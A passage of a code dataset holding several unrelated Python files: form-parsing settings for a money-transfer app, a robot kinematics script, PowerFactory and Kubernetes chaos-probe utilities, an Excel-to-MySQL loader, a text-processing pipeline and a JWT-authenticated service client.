os.path.join(PROJECT_DIR,r'Forms\\ReceiveForm\\AgentCopy.html')\n\nREFUND_FORM_CUSTOMER_TEMPLATE = os.path.join(PROJECT_DIR,r'Forms\\RefundForm\\CustomerCopy.html')\n\nREFUND_FORM_AGENT_TEMPLATE = os.path.join(PROJECT_DIR,r'Forms\\RefundForm\\AgentCopy.html')\n\nSEND_FORM_CUSTOMER_TEMPLATE = os.path.join(PROJECT_DIR,r'Forms\\SendForm\\CustomerCopy.html')\n\nSEND_FORM_AGENT_TEMPLATE = os.path.join(PROJECT_DIR,r'Forms\\SendForm\\AgentCopy.html')\n\nMAIN_CSS_PATH = os.path.join(PROJECT_DIR,r'Forms\\Resources\\css\\main.css')\n\n# ======= DATES DICTIONARIES =======\nmoneygram_month_to_num_month_dict = {\n \"JAN\": \"01\",\n \"FEB\": \"02\",\n \"MAR\": \"03\",\n \"APR\": \"04\",\n \"MAY\": \"05\",\n \"JUN\": \"06\",\n \"JUL\": \"07\",\n \"AUG\": \"08\",\n \"SEP\": \"09\",\n \"OCT\": \"10\",\n \"NOV\": \"11\",\n \"DEC\": \"12\",\n}\n\nnum_month_to_moneygram_month_dict = {\n \"01\": \"Jan\",\n 1: \"Jan\",\n \"02\": \"Feb\",\n 2: \"Feb\",\n \"03\": \"Mar\",\n 3: \"Mar\",\n \"04\": \"Apr\",\n 4: \"Apr\",\n \"05\": \"May\",\n 5: \"May\",\n \"06\": \"Jun\",\n 6: \"Jun\",\n \"07\": \"Jul\",\n 7: \"Jul\",\n \"08\": \"Aug\",\n 8: \"Aug\",\n \"09\": \"Sep\",\n 9: \"Sep\",\n \"10\": \"Oct\",\n 10: \"Oct\",\n \"11\": \"Nov\",\n 11: \"Nov\",\n \"12\": \"Dec\",\n 12: \"Dec\",\n}\n\nnum_month_to_string_month_dict = {\n \"01\": \"JANUARY\",\n 1: \"JANUARY\",\n \"02\": \"FEBRUARY\",\n 2: \"FEBRUARY\",\n \"03\": \"MARCH\",\n 3: \"MARCH\",\n \"04\": \"APRIL\",\n 4: \"APRIL\",\n \"05\": \"MAY\",\n 5: \"MAY\",\n \"06\": \"JUNE\",\n 6: \"JUNE\",\n \"07\": \"JULY\",\n 7: \"JULY\",\n \"08\": \"AUGUST\",\n 8: \"AUGUST\",\n \"09\": \"SEPTEMBER\",\n 9: \"SEPTEMBER\",\n \"10\": \"OCTOBER\",\n 10: \"OCTOBER\",\n \"11\": \"NOVEMBER\",\n 11: \"NOVEMBER\",\n \"12\": \"DECEMBER\",\n 12: \"DECEMBER\"\n}\n\nnum_month_to_heb_month = {\n \"01\": \"ינואר\",\n 1: \"ינואר\",\n \"02\": \"פברואר\",\n 2: \"פברואר\",\n \"03\": \"מרץ\",\n 3: \"מרץ\",\n \"04\": \"אפריל\",\n 4: \"אפריל\",\n \"05\": \"מאי\",\n 5: \"מאי\",\n \"06\": \"יוני\",\n 6: \"יוני\",\n \"07\": \"יולי\",\n 7: \"יולי\",\n \"08\": \"אוגוסט\",\n 8: \"אוגוסט\",\n \"09\": \"ספטמבר\",\n 9: \"ספטמבר\",\n \"10\": \"אוקטובר\",\n 10: \"אוקטובר\",\n \"11\": \"נובמבר\",\n 11: \"נובמבר\",\n \"12\": \"דצמבר\",\n 12: \"דצמבר\"\n}\n\n\n# =========REGEX===========#\nsend_regex_filters = \"Sender's name([\\\\w\\\\W]*?)Address([\\\\w\\\\W]*?) \" + \\\n \"Tel. 
Number([\\\\w\\\\W]*?)Occupation([\\\\w\\\\W]*?)\" + \\\n \"Sender's ID([\\\\w\\\\W]*?)ID Country of issuance\" + \\\n \"([\\\\w\\\\W]*?)Date of birth([\\\\w\\\\W]*?)Destination([\\\\w\\\\W]*?)\" + \\\n \"Service Type([\\\\w\\\\W]*?)Transaction status([\\\\w\\\\W]*?)\" + \\\n \"Send currency([\\\\w\\\\W]*?)Amount Sent([\\\\w\\\\W]*?)Customer Fee([\\\\w\\\\W]*?)Discount\" + \\\n \"([\\\\w\\\\W]*?)Total collected([\\\\w\\\\W]*?)Send agent([\\\\w\\\\W]*?)\" + \\\n \"Receiver's Name([\\\\w\\\\W]*?)Receive Amount([\\\\w\\\\W]*?)\" + \\\n \"Receive Currency([\\\\w\\\\W]*?)Exchange Rate([\\\\w\\\\W]*?)\" + \\\n \"REFERENCE NUMBER([\\\\w\\\\W]*?)Declaration[\\w\\W]*?___ ([\\w\\W]*?)\" + \\\n \"For details\"\n\nsend_fields_names = ('sender_name', 'sender_address', 'sender_telephone',\n 'occupation', 'sender_id', 'nationality',\n 'date_of_birth', 'destination', 'service_type',\n 'transaction_status', 'send_currency',\n 'amount', 'fee','discount', 'total_collected',\n 'send_agent', 'receiver_name', 'receive_amount',\n 'receive_currency', 'exchange_rate', 'reference_number', 'full_date')\n\nrefund_regex_filters = \"Sender's name([\\\\w\\\\W]*?)Address([\\\\w\\\\W]*?) \" + \\\n \"Tel. Number([\\\\w\\\\W]*?)Occupation([\\\\w\\\\W]*?)\" + \\\n \"Sender's ID([\\\\w\\\\W]*?)ID Country of issuance\" + \\\n \"([\\\\w\\\\W]*?)Date of birth([\\\\w\\\\W]*?)Destination([\\\\w\\\\W]*?)\" + \\\n \"Receiver's Name([\\\\w\\\\W]*?)Send date([\\\\w\\\\W]*?)Send currency([\\\\w\\\\W]*?)\" + \\\n \"Amount Sent([\\\\w\\\\W]*?)Customer Fee([\\\\w\\\\W]*?)Total collected([\\\\w\\\\W]*?)\" + \\\n \"Send agent([\\\\w\\\\W]*?)Cancel date([\\\\w\\\\W]*?)Reason code([\\\\w\\\\W]*?)\" + \\\n \"Transaction status([\\\\w\\\\W]*?)Total refunded([\\\\w\\\\W]*?)Currency([\\\\w\\\\W]*?)\" + \\\n \"REFERENCE NUMBER([\\\\w\\\\W]*?)TERMS\"\n\nrefund_field_names = ('sender_name', 'sender_address', 'sender_telephone', 'occupation', 'sender_id', 'nationality',\n 'date_of_birth', 'destination', 'receiver_name', 'send_date', 'send_currency', 'amount', 'fee',\n 'total_collected', 'send_agent', 'cancel_date', 'reason_code', 'transaction_status',\n 'total_refunded', 'refund_currency', 'reference_number', 'full_date')\n\nreceive_regex_filters = \"REFERENCE NUMBER([\\\\w\\\\W]*?)CUSTOMER INFORMATIONRECEIVE INFORMATION\" + \\\n \"Receiver's Name([\\\\w\\\\W]*?)Address([\\\\w\\\\W]*?)Tel. Number\" + \\\n \"([\\\\w\\\\W]*?)Occupation([\\\\w\\\\W]*?)Receiver's ID([\\\\w\\\\W]*?)ID Country of issuance\" + \\\n \"([\\\\w\\\\W]*?)Date of birth([\\\\w\\\\W]*?)Sender's Name([\\\\w\\\\W]*?)\" + \\\n \"Receive country([\\\\w\\\\W]*?)Receive Agent([\\\\w\\\\W]*?)(Date[\\\\w\\\\W]*?)\" + \\\n \"Transaction status([\\\\w\\\\W]*?)Receive amount([\\\\w\\\\W]*?)Receive currency([\\\\w\\\\W]*?) 
This\"\n\nreceive_field_names = ('reference_number', 'receiver_name', 'address', 'Telephone_number', 'occupation', 'receiver_id',\n 'nationality', 'date_of_birth', 'sender_name', 'receive_country', 'receive_agent',\n 'receive_date', 'transaction_status', 'receive_amount', 'receive_currency', 'date')\n\n\n# ==========TESTING===========\nFILES_TEST_DIR = 'files'\n\nTESTS_DIR = 'tests'\n\nTESTING = False\n\ntesting_excel_destination_folder = os.path.join(PROJECT_DIR, TESTS_DIR, FILES_TEST_DIR)\ncurrency_sign_dict = {'USD': '$', 'EUR': '€'}","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"258385356","text":"# 3 link robot \r\n#for basis function 'x2'\r\n#changed gamma is 45 degrees \r\nfrom sympy.interactive import printing \r\nprinting.init_printing(use_latex=True)\r\nimport numpy as np \r\nimport sympy as sym\r\nimport matplotlib.pyplot as plt \r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport math\r\n\r\n\r\n#ax=plt.axes(projection='3d')\r\n\r\ny1new=sym.Symbol('y1new')\r\nx1new=sym.Symbol('x1new')\r\ny2new=sym.Symbol('y2new')\r\nx2new=sym.Symbol('x2new')\r\nx3new=sym.Symbol('x3new')\r\ny3new=sym.Symbol('y3new')\r\nx2=sym.Symbol('x2')\r\nx1=sym.Symbol('x1')\r\nx3=sym.Symbol('x3')\r\ny1=sym.Symbol('y1')\r\ny2=sym.Symbol('y2')\r\ny3=sym.Symbol('y3')\r\na1=sym.Symbol('a1')\r\na2=sym.Symbol('a2')\r\na3=sym.Symbol('a3')\r\ndeltax3=sym.Symbol('deltax3')\r\ndeltay3=sym.Symbol('deltay3')\r\ntheta1=sym.Symbol('theta1')\r\ntheta2=sym.Symbol('theta2')\r\ntheta3=sym.Symbol('theta3')\r\ntheta1new=sym.Symbol('theta1new')\r\ntheta2new=sym.Symbol('theta2new')\r\ntheta3new=sym.Symbol('theta3new')\r\ngamma=sym.Symbol('gamma')\r\n\r\n#defining values\r\nl1=1\r\nl2=1\r\nl3=1\r\ngamma=0.901\r\n\r\n#finding the x positions by solving y=x^2\r\nx1=0.62\r\nx2=x1*2\r\nx3=x2*2\r\ny1=x1**2\r\ny2=x2**2\r\ny3=x3**2\r\n\r\n#now we modify the shape of the 2nd link\r\ndeltax3=0\r\ndeltax3plot=[]\r\nx3newplot=[]\r\na1_plot=[]\r\na2_plot=[]\r\na3_plot=[]\r\n\r\nfor i in range(10):\r\n deltay3=i*0.01\r\n x3new=x3-deltax3\r\n y3new=y3-deltay3\r\n x2new=x3new-l3*math.cos(gamma)\r\n y2new=y3new-l3*math.sin(gamma)\r\n print(x2new)\r\n print(y2new)\r\n print((x2new**2+y2new**2-l1**2-l2**2)/2*l1*l2)\r\n theta2new=math.acos((x2new**2+y2new**2-l1**2-l2**2)/2*l1*l2)\r\n theta1new=math.atan(y2new/x2new)-math.atan((l2*math.sin(theta2new))/l1+l2*math.cos(theta2new))\r\n theta3new=gamma-(theta1new+theta2new)\r\n x1new=l1*math.cos(theta1new)\r\n y1new=l1*math.sin(theta1new)\r\n solution=sym.solve((a1*x3new+(a2*(x3new**2))+(a3*(x3new**3))-y3new,a1*x2new+(a2*(x2new**2))+(a3*(x2new**3))-y2new,a1*x1new+(a2*(x1new**2))+(a3*(x1new**3))-y1new),(a1,a2,a3))\r\n a1_sol=solution[a1]\r\n a2_sol=solution[a2]\r\n a3_sol=solution[a3]\r\n deltax3plot.append(deltay3)\r\n a1_plot.append(a1_sol)\r\n a2_plot.append(a2_sol)\r\n a3_plot.append(a3_sol)\r\n\r\n#a1 plot\r\nfig=plt.figure()\r\nplt.plot(deltax3plot,a1_plot)\r\nplt.savefig('C:/Users/rheap/Documents/CMU/BioRobotics lab/results/3_link_x2_a1plot')\r\nplt.show()\r\n\r\n#a2 plot\r\nfig2=plt.figure()\r\nplt.plot(deltax3plot,a2_plot)\r\nplt.savefig('C:/Users/rheap/Documents/CMU/BioRobotics lab/results/3_link_x2_a2plot')\r\nplt.show()\r\n\r\n#a3 plot\r\nfig3=plt.figure()\r\nplt.plot(deltax3plot,a3_plot)\r\nplt.savefig('C:/Users/rheap/Documents/CMU/BioRobotics lab/results/3_link_x2_a3plot')\r\nplt.show()\r\n\r\n\r\n 
","sub_path":"Code/3_link_x2.py","file_name":"3_link_x2.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"52920752","text":"import sys\r\n# Python PowerFactory API\r\nimport powerfactory as pf\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom bokeh.plotting import figure, show, output_file\r\n\r\n# Ergon Energy Helper Functions for Logging\r\nsys.path.append(r'\\\\Ecasd01\\WksMgmt\\PowerFactory\\Scripts\\pfTextOutputs')\r\nimport pftextoutputs\r\n# Ergon Energy Helper Functions for lots of stuff, inc Ecorp ID extraction\r\nsys.path.append(r'\\\\Ecasd01\\WksMgmt\\PowerFactory\\ScriptsDEV\\pfSharedFunctions')\r\nimport pfsharedfunctions as pfsf\r\n\r\n#import CSV\r\nimport csv\r\n\r\n# Logging, A more efficient way to print\r\nimport logging\r\nlogger = logging.getLogger(__name__)\r\n\r\n# Ergon Energy Helper Functions for getting members\r\nsys.path.append(\r\n r\"\\\\Ecasd01\\WksMgmt\\PowerFactory\\ScriptsDEV\\ShortPFScripts\\PrintScripts\\PrintPFObjectMembers\"\r\n)\r\nimport printPFObjectV2_descs as printmembers\r\n \r\nimport datetime\r\nimport os\r\n\r\ndef run_main():\r\n app = pf.GetApplication()\r\n start_stuff(app)\r\n \r\ndef start_stuff(app, project=None):\r\n \"\"\"\r\n This function can be handed app and a project and do\r\n whatever is required. This allows it to be run by\r\n another script if required\r\n \"\"\"\r\n with pftextoutputs.PowerFactoryLogging(\r\n pf_app=app,\r\n add_handler=True,\r\n handler_level=logging.DEBUG,\r\n logger_to_use=logger,\r\n formatter=pftextoutputs.PFFormatter(\r\n '%(module)s: Line: %(lineno)d: %(message)s' # format for printing stuff to the console\r\n )\r\n ) as pflogger:\r\n create_voltage_diff_plot(app, project)\r\n \r\ndef create_voltage_diff_plot(app, project=None):\r\n \"\"\"\r\n In Here is where you actually start doing stuff to the model.\r\n Iterate through stuff, call other functions. 
Etc.\r\n \"\"\"\r\n project = app.GetActiveProject()\r\n if project is None:\r\n logger.error(\"No Active Project or passed project, Ending Script\")\r\n return\r\n\r\n main(app)\r\n current_script = app.GetCurrentScript()\r\n\r\n\r\ndef main(app):\r\n\t\r\n\tldf = app.GetFromStudyCase('ComLdf')\r\n\tsuccess = ldf.Execute() # returns a 0 on success and >1 on fail\r\n\t\r\n\t\r\n\tif success == 0:\r\n\t\tapp.PrintPlain('Name of all lines:')\r\n\t\tprint_lines(app)\r\n\t\t\r\n\t\tapp.PrintPlain('Length of L3-4:')\r\n\t\tprint_line1(app)\r\n\t\t\r\n\t\tapp.PrintPlain('Changing the length of L3-4:')\r\n\t\tmodify_length(app)\r\n\t\r\n\t\r\ndef print_lines(app):\r\n\t'''\r\n\tPrint all the lines in the project\r\n\t'''\r\n\tlines = app.GetCalcRelevantObjects('*.ElmLne')\r\n\tfor line in lines:\r\n\t\tapp.PrintPlain(line.loc_name)\r\n\tapp.PrintPlain('\\n')\r\n\t\t\r\ndef modify_length(app):\r\n\t'''\r\n\tchange the length of a given line\r\n\t'''\r\n\tmodify_line = 'L3-4'\r\n\tnew_length = 5\r\n\tAllObj = app.GetCalcRelevantObjects()\r\n\ttry:\r\n\t\tlines = app.GetCalcRelevantObjects(modify_line + '.ElmLne')\r\n\t\tline = lines[0] # get the first line in a list of lines named 'L3-4'\r\n\t\told_length = line.dline\r\n\t\tline.dline = new_length\r\n\t\tapp.PrintPlain('Length of {} has been changed from {} to {}'.format(line.loc_name, old_length, line.dline))\r\n\texcept IndexError:\r\n\t\tapp.PrintPlain('couldnt find line')\r\n\t\r\n\t\r\ndef print_line1(app):\r\n\t'''\r\n\tprint the first line\r\n\t'''\r\n\tfirst_line = 'L3-4'\r\n\tAllObj = app.GetCalcRelevantObjects()\r\n\tline = app.GetCalcRelevantObjects(first_line + '.ElmLne')\r\n\ttry:\r\n\t\tapp.PrintPlain('{}km'.format(line[0].dline))\r\n\texcept IndexError:\r\n\t\tapp.PrintPlain('couldnt find line\\n')\r\n\r\n\t\t\r\nif __name__ == '__main__':\r\n run_main()\r\n","sub_path":"accessing_network_objects.py","file_name":"accessing_network_objects.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"25516409","text":"import random\r\n\r\n\r\n# Генератор вычленения полей из массива словарей\r\n# Пример:\r\n# goods = [\r\n# {'title': 'Ковер', 'price': 2000, 'color': 'green'},\r\n# {'title': 'Диван для отдыха', 'price': 5300, 'color': 'black'}\r\n# ]\r\n# field(goods, 'title') должен выдавать 'Ковер', 'Диван для отдыха'\r\n# field(goods, 'title', 'price') должен выдавать {'title': 'Ковер', 'price': 2000}, {'title': 'Диван для отдыха', 'price': 5300}\r\n\r\ndef field(items, *args):\r\n assert len(args) > 0\r\n l = len(args)\r\n # Необходимо реализовать генератор\r\n for i in items:\r\n #print(type(i))\r\n b = dict()\r\n for k, v in i.items():\r\n if v is not None:\r\n if k in args:\r\n if l == 1:\r\n b = v\r\n else:\r\n b[k] = v\r\n else:\r\n continue\r\n if b:\r\n yield b\r\n\r\n# Генератор списка случайных чисел\r\n# Пример:\r\n# gen_random(1, 3, 5) должен выдать примерно 2, 2, 3, 2, 1\r\n# Hint: реализация занимает 2 строки\r\ndef gen_random(begin, end, num_count):\r\n for i in range(num_count):\r\n yield random.randint(begin, end)\r\n","sub_path":"Lab3/librip/gens.py","file_name":"gens.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"345563310","text":"import xlrd\r\nimport pymysql\r\ndef update(sql,parame):\r\n con = pymysql.connect(host='localhost', user='root', password='1234', database='excel_to_db')\r\n couser = con.cursor()\r\n 
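# bind parame into the %s placeholders at execute time; each update() call opens, commits and closes its own connection\r\n 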
couser.execute(sql,parame)\r\n con.commit()\r\n couser.close()\r\n con.close()\r\ndef create_table(bookname,page):\r\n wb = xlrd.open_workbook(bookname)\r\n for i in range(page):\r\n wb_view = wb.sheet_by_index(i)\r\n cols = wb_view.ncols\r\n print(i+1,'月',cols)\r\n update('create table %s月的销售情况 (`%s` varchar (20))',(i+1,wb_view.cell_value(0,0)))\r\n for j in range(1,cols):\r\n print('shangmian',j)\r\n update('alter table %s月的销售情况 add `%s`varchar (20)',(i+1,wb_view.cell_value(0,j)))\r\n print('xiamian',j)\r\n\r\ncreate_table('2020年每个月的销售情况.xlsx',12)\r\ndef excel_to_db(bookname,page):\r\n wb = xlrd.open_workbook(bookname)\r\n for i in range(page):\r\n wb_view = wb.sheet_by_index(i)\r\n rows = wb_view.nrows\r\n cols = wb_view.ncols\r\n for j in range(1,rows):\r\n prame = [i + 1]\r\n for k in range(cols):\r\n prame.append(wb_view.cell_value(j,k))\r\n print(prame)\r\n update('insert into %s月的销售情况 values (%s,%s,%s,%s,%s)',prame)\r\nexcel_to_db('2020年每个月的销售情况.xlsx',12)","sub_path":"excel to db.py","file_name":"excel to db.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"482059879","text":"\"\"\"\nPipeline for text processing implementation\n\"\"\"\n\nfrom pymystem3 import Mystem\nfrom article import Article\nimport os\nimport re\nfrom pathlib import Path\nfrom typing import List\nfrom constants import ASSETS_PATH\n\n\nclass EmptyDirectoryError(Exception):\n \"\"\"\n Custom error\n \"\"\"\n\n\nclass InconsistentDatasetError(Exception):\n \"\"\"\n Custom error\n \"\"\"\n\n\nclass UnknownDatasetError(Exception):\n \"\"\"\n Custom error\n \"\"\"\n\n\nclass MorphologicalToken:\n \"\"\"\n Stores language params for each processed token\n \"\"\"\n def __init__(self, original_word, normalized_form):\n self.original_word = original_word\n self.normalized_form = normalized_form\n self.mystem_tags = ''\n self.pymorphy_tags = ''\n\n def __str__(self):\n return self.normalized_form\n\n\nclass CorpusManager:\n \"\"\"\n Works with articles and stores them\n \"\"\"\n def __init__(self, path_to_raw_txt_data: str):\n self.path_to_raw_txt_data = path_to_raw_txt_data\n self._storage = {}\n\n def _scan_dataset(self):\n \"\"\"\n Register each dataset entry\n \"\"\"\n files = os.listdir(self.path_to_raw_txt_data)\n for file in files:\n ind_underscore = file.index('_')\n is_raw_txt = re.match(r'.+_raw\\.txt', file)\n if is_raw_txt:\n self._storage[int(file[:ind_underscore])] = Article(url=None, article_id=int(file[:ind_underscore]))\n return None\n\n def get_articles(self):\n \"\"\"\n Returns storage params\n \"\"\"\n self._scan_dataset()\n return self._storage.values()\n\n\nclass TextProcessingPipeline:\n \"\"\"\n Process articles from corpus manager\n \"\"\"\n def __init__(self, corpus_manager: CorpusManager):\n self.corpus_manager = corpus_manager\n\n def run(self):\n \"\"\"\n Runs pipeline process scenario\n \"\"\"\n articles = self.corpus_manager.get_articles()\n for article in articles:\n raw_text_article = article.get_raw_text()\n result = Mystem().analyze(raw_text_article)\n tokens = self._process(mystem_analize_result=result) # list with instances MorphToken\n processed_text_tokens = []\n for token in tokens:\n processed_text_tokens.append('{}<{}>'.format(token.__str__(), token.mystem_tags))\n processed_text = ' '.join(processed_text_tokens)\n article.save_processed(processed_text)\n return None\n\n def _process(self, mystem_analize_result) -> List[type(MorphologicalToken)]:\n \"\"\"\n Performs processing of 
each text\n \"\"\"\n tokens = []\n for element in mystem_analize_result:\n if element.get('analysis') is None:\n continue\n if not element.get('analysis'):\n token = MorphologicalToken(original_word=element['text'], normalized_form=element['text'])\n else:\n token = MorphologicalToken(original_word=element['text'],\n normalized_form=element['analysis'][0].get('lex'))\n token.mystem_tags = '{}'.format(element['analysis'][0].get('gr'))\n tokens.append(token)\n return tokens\n\n\ndef validate_dataset(path_to_validate):\n \"\"\"\n Validates folder with assets\n \"\"\"\n path = Path(path_to_validate)\n\n if not path.exists():\n raise FileNotFoundError\n\n if not path.is_dir():\n raise NotADirectoryError\n\n if not list(path.iterdir()):\n raise EmptyDirectoryError\n\n \ndef main():\n print('Your code goes here')\n validate_dataset(ASSETS_PATH)\n corpus_manager = CorpusManager(path_to_raw_txt_data=ASSETS_PATH)\n pipeline = TextProcessingPipeline(corpus_manager=corpus_manager)\n pipeline.run()\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"514072838","text":"from chaoslib.exceptions import ActivityFailed\nfrom chaoslib.types import Secrets\nfrom kubernetes import client\nfrom logzero import logger\n\nfrom chaosk8s import create_k8s_api_client\n\n__all__ = [\"service_is_initialized\"]\n\n\ndef service_is_initialized(\n name: str = None,\n ns: str = \"default\",\n label_selector: str = None,\n secrets: Secrets = None,\n) -> bool:\n \"\"\"\n Lookup a service endpoint by its name and raises :exc:`FailedProbe` when\n the service was not found or not initialized.\n \"\"\"\n api = create_k8s_api_client(secrets)\n\n v1 = client.CoreV1Api(api)\n\n if name and not label_selector:\n logger.debug(f\"Filtering services by name {name}\")\n ret = v1.list_namespaced_service(ns, field_selector=f\"metadata.name={name}\")\n logger.debug(f\"Found {len(ret.items)} service(s) named '{name}' in ns '{ns}'\")\n elif label_selector and not name:\n logger.debug(f\"Filtering services by label {label_selector}\")\n ret = v1.list_namespaced_service(ns, label_selector=label_selector)\n logger.debug(\n f\"Found {len(ret.items)} service(s) in ns '{ns}'\"\n \" labelled '{label_selector}'\"\n )\n elif name and label_selector:\n logger.debug(f\"Filtering services by name {name} and label {label_selector}\")\n ret = v1.list_namespaced_service(\n ns,\n field_selector=f\"metadata.name={name}\",\n label_selector=label_selector,\n )\n logger.debug(\n f\"Found {len(ret.items)} service(s) named '{name}' and labelled\"\n f\" '{label_selector}' in ns '{ns}'\"\n )\n else:\n ret = v1.list_namespaced_service(ns)\n logger.debug(f\"Found {len(ret.items)} service(s) in ns '{ns}'\")\n\n if not ret.items:\n raise ActivityFailed(f\"service '{name}' is not initialized\")\n\n return True\n","sub_path":"chaosk8s/service/probes.py","file_name":"probes.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"41814026","text":"import re\n\ndef searchLinks(f):\n\tres = \"\"\n\tif (f.find(\"@\") != -1):\n\t\tres = \"[контакты запрещены] \"\n\telif ((f.find(\"//\") != -1) or ((f.find(\"www\") != -1) and (f.find(\".\") != -1) and (f.find(\"www\") < f.find(\".\"))) or (f.find(\".ru\") != -1) or (f.find(\".com\") != -1) or (f.find(\".рф\") != -1) or (f.find(\".net\") != -1)): 
#и другие домены верхнего уровня\n\t\tres = \"[ссылка запрещена] \"\n\telif (len(f) > 3 and f.isdigit() == True):\n\t\tres = \"\"\n\telse:\n\t\tres = f+\" \"\n\n\treturn res\n\ndef start():\n\tfl = \"y\"\n\twhile (fl == \"y\"):\n\t\tstring = input(\"Введите строку: \")\n\t\tstring = string.lower()\n\t\tmass = string.split(\" \")\n\t\tmass[0] = mass[0].capitalize()\n\t\tres = \"\"\n\n\t\tfor i in mass:\n\t\t\tel = searchLinks(i)\n\t\t\tres += el\n\n\t\tprint(res)\n\t\tfl = input(\"Продолжить? (y / n): \")\n\nstart()","sub_path":"1__2__Parser/main_Func.py","file_name":"main_Func.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"256450374","text":"import datetime\nimport json\nfrom urllib.parse import urlencode, quote\n\nimport boto3\nimport jwt\nimport localstack_client.session\nimport requests\nfrom botocore.exceptions import ClientError\n\n# from ..api.helpers import custom_logger\n\n# logger = custom_logger(\"opg_sirius_service\")\nimport logging\n\nlogger = logging\n\n\nclass SiriusService:\n def __init__(self, config_params, cache):\n\n try:\n self.cache = cache\n self.sirius_base_url = config_params.SIRIUS_BASE_URL\n self.environment = config_params.ENVIRONMENT\n self.session_data = config_params.SESSION_DATA\n self.request_caching = (\n config_params.REQUEST_CACHING if cache else \"disabled\"\n )\n self.request_caching_name = (\n config_params.REQUEST_CACHE_NAME\n if config_params.REQUEST_CACHE_NAME\n else \"default_sirius_cache\"\n )\n self.request_caching_ttl = (\n config_params.REQUEST_CACHING_TTL\n if config_params.REQUEST_CACHING_TTL\n else 48\n )\n except Exception as e:\n logger.info(f\"Error loading config e: {e}\")\n\n def build_sirius_url(self, endpoint, url_params=None):\n \"\"\"\n Builds the url for the endpoint from variables (probably saved in env vars)\n\n Args:\n base_url: URL of the Sirius server\n api_route: path to public api\n endpoint: endpoint\n Returns:\n string: url\n \"\"\"\n\n base_url = self.sirius_base_url\n\n sirius_url = f\"{base_url}/{quote(endpoint)}\"\n\n if url_params:\n encoded_params = urlencode(url_params)\n url = f\"{sirius_url}?{encoded_params}\"\n else:\n url = sirius_url\n\n return url\n\n def _get_secret(self):\n \"\"\"\n Gets and decrypts the JWT secret from AWS Secrets Manager for the chosen environment\n This was c&p directly from AWS Secrets Manager...\n\n Args:\n environment: AWS environment name\n Returns:\n JWT secret\n Raises:\n ClientError\n \"\"\"\n\n environment = self.environment\n secret_name = f\"{environment}/jwt-key\"\n region_name = \"eu-west-1\"\n\n if environment == \"local\": # pragma: no cover\n logger.info(\"Using local AWS Secrets Manager\") # pragma: no cover\n current_session = localstack_client.session.Session() # pragma: no cover\n\n else:\n current_session = boto3.session.Session()\n\n client = current_session.client(\n service_name=\"secretsmanager\", region_name=region_name\n )\n\n try:\n get_secret_value_response = client.get_secret_value(SecretId=secret_name)\n secret = get_secret_value_response[\"SecretString\"]\n except ClientError as e:\n logger.info(f\"Unable to get secret from Secrets Manager {e}\")\n raise e\n\n return secret\n\n def _build_sirius_headers(self, content_type=\"application/json\"):\n \"\"\"\n Builds headers for Sirius request, including JWT auth\n\n Args:\n content_type: string, defaults to 'application/json'\n Returns:\n Header dictionary with content type and auth token\n \"\"\"\n\n if not 
content_type:\n            content_type = \"application/json\"\n\n        session_data = self.session_data\n\n        encoded_jwt = jwt.encode(\n            {\n                \"session-data\": session_data,\n                \"iat\": datetime.datetime.utcnow(),\n                \"exp\": datetime.datetime.utcnow() + datetime.timedelta(seconds=3600),\n            },\n            self._get_secret(),\n            algorithm=\"HS256\",\n        )\n\n        return {\n            \"Content-Type\": content_type,\n            \"Authorization\": \"Bearer \" + encoded_jwt.decode(\"UTF8\"),\n        }\n\n    def _handle_sirius_error(\n        self, error_code=None, error_message=None, error_details=None\n    ):\n        error_code = error_code if error_code else 500\n        error_message = (\n            error_message if error_message else \"Unknown error talking to Sirius\"\n        )\n\n        try:\n            error_details = error_details[\"detail\"]\n\n        except (KeyError, TypeError):\n            error_details = (\n                str(error_details) if len(str(error_details)) > 0 else \"None\"\n            )\n\n        message = f\"{error_message}, details: {str(error_details)}\"\n        logger.error(message)\n        return error_code, message\n\n    def check_sirius_available(self):\n        healthcheck_url = f\"{self.sirius_base_url}/api/health-check\"\n        r = requests.get(url=healthcheck_url)\n\n        return r.status_code == 200\n        # return True\n\n    def check_cache_available(self):\n        try:\n            return self.cache.ping()\n        except Exception as e:\n            logger.error(f\"Unable to connect to cache: {e}\")\n            return False\n\n    def send_request_to_sirius(self, key, url, method, content_type=None, data=None):\n\n        cache_enabled = True if self.request_caching == \"enabled\" else False\n\n        if self.check_sirius_available():\n            sirius_status_code, sirius_data = self._get_data_from_sirius(\n                url, method, content_type, data\n            )\n            logger.info(f\"sirius_status_code: {sirius_status_code}\")\n            logger.info(f\"cache_enabled: {cache_enabled}\")\n            logger.info(f\"method: {method}\")\n            if cache_enabled and method == \"GET\" and sirius_status_code == 200:\n                logger.info(f\"Putting data in cache with key: {key}\")\n                self._put_sirius_data_in_cache(key=key, data=sirius_data)\n\n            return sirius_status_code, sirius_data\n        else:\n            if cache_enabled and method == \"GET\":\n                logger.info(f\"Getting data from cache with key: {key}\")\n                sirius_status_code, sirius_data = self._get_sirius_data_from_cache(\n                    key=key\n                )\n\n                return sirius_status_code, sirius_data\n            else:\n                return self._handle_sirius_error(\n                    error_message=f\"Unable to send request to Sirius\",\n                    error_details=f\"Sirius not available\",\n                )\n\n    def _get_data_from_sirius(self, url, method, content_type=None, data=None):\n        logger.info(\"_get_data_from_sirius\")\n        headers = self._build_sirius_headers(content_type)\n\n        try:\n            if method == \"PUT\":\n                r = requests.put(url=url, data=data, 